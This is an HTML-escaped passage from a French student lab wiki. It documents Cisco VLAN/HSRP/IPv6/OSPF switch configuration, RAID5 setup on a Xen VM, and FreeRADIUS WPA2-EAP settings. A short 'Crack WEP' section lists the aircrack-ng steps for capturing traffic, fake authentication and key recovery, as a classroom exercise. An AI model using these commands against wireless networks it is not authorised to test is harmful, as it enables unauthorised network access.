 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
